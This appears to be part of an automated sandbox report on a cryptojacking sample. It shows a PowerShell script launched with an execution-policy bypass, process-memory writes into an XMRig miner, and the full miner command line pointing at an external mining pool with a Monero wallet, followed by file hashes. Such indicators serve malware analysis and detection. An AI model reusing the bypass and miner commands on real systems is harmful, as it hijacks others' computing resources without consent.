| Description | Indicator | Process | Target |
| PID 4564 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4564 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nilecpw2.lhe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |